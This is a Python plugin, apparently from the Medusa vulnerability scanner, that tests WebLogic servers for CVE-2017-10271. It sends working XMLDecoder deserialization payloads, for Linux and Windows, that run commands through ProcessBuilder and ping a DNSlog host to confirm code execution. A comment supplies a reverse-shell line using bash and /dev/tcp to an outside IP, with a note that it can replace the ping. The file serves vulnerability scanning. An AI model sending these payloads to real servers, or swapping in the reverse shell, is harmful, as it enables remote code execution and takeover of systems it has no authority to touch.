#!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = 'Ascotbe'
from ClassCongregation import VulnerabilityDetails,UrlProcessing,ErrorLog,WriteFile,ErrorHandling,Dnslog
import urllib3
import requests
import time
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
class VulnerabilityInfo(object):
    def __init__(self,Medusa):
        self.info = {}
        self.info['number']="CVE-2017-10271" #如果没有CVE或者CNVD编号就填0，CVE编号优先级大于CNVD
        self.info['author'] = "Ascotbe"  # 插件作者
        self.info['create_date'] = "2020-6-2"  # 插件编辑时间
        self.info['disclosure'] = '2017-12-22'  # 漏洞披露时间，如果不知道就写编写插件的时间
        self.info['algroup'] = "WebLogicXMLDecoderDeserializationVulnerability"  # 插件名称
        self.info['name'] ='WebLogicXMLDecoder反序列化漏洞' #漏洞名称
        self.info['affects'] = "Weblogic"  # 漏洞组件
        self.info['desc_content'] = "OracleFusionMiddleware中的WebLogicServer组件的WLSSecurity子组件存在安全漏洞。使用精心构造的xml数据可能造成任意代码执行，攻击者只需要发送精心构造的HTTP请求，就可以拿到目标服务器的权限"  # 漏洞描述
        self.info['rank'] = "高危"  # 漏洞等级
        self.info['version'] = "WebLogicServer10.3.6.0.0版本\r\nWebLogicServer12.1.3.0.0版本\r\nWebLogicServer12.2.1.1.0版本"  # 这边填漏洞影响的版本
        self.info['suggest'] = "升级最新Weblogic版本"  # 修复建议
        self.info['details'] = Medusa  # 结果


def medusa(**kwargs)->None:
    url = kwargs.get("Url")  # 获取传入的url参数
    Headers = kwargs.get("Headers")  # 获取传入的头文件
    proxies = kwargs.get("Proxies")  # 获取传入的代理参数
    DL = Dnslog()
    #<string>bash -i &gt;&amp; /dev/tcp/10.0.0.1/21 0&gt;&amp;1</string>反弹shell，替换ping位置数据
    linux_data='''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>ping {}</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>'''.format(DL.dns_host())
    windows_data='''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
        <java version="1.8.0_131" class="java.beans.XMLDecoder">
          <void class="java.lang.ProcessBuilder">
            <array class="java.lang.String" length="3">
              <void index="0">
                <string>C:\Windows\System32\cmd.exe</string>
              </void>
              <void index="1">
                <string>/c</string>
              </void>
              <void index="2">
                <string>ping {}</string>
              </void>
            </array>
          <void method="start"/></void>
        </java>
      </work:WorkContext>
    </soapenv:Header>
  <soapenv:Body/>
</soapenv:Envelope>
'''.format(DL.dns_host())
    for data in [linux_data, windows_data]:
        try:
            payload = '/wls-wsat/CoordinatorPortType'
            payload_url = url+ payload

            Headers["Content-Type"]="text/xml"

            resp = requests.post(payload_url,headers=Headers,data=data, proxies=proxies, timeout=6, verify=False)
            con = resp.text
            time.sleep(4)
            if DL.result():
                Medusa = "{}存在WebLogicXMLDecoder反序列化漏洞(CVE-2017-10271)\r\n验证数据:\r\n漏洞位置:{}\r\n利用POC:{}\r\n返回数据包:{}\r\nDNSlog数据:{}\r\nDNSlog随机数:{}\r\n".format(url, payload_url,data, con,DL.dns_text(),DL.dns_host())
                _t = VulnerabilityInfo(Medusa)
                VulnerabilityDetails(_t.info, resp,**kwargs).Write()  # 传入url和扫描到的数据
                WriteFile().result(str(url),str(Medusa))#写入文件，url为目标文件名统一传入，Medusa为结果
        except Exception as e:
            _ = VulnerabilityInfo('').info.get('algroup')
            ErrorHandling().Outlier(e, _)
            ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)  # 调用写入类传入URL和错误插件名

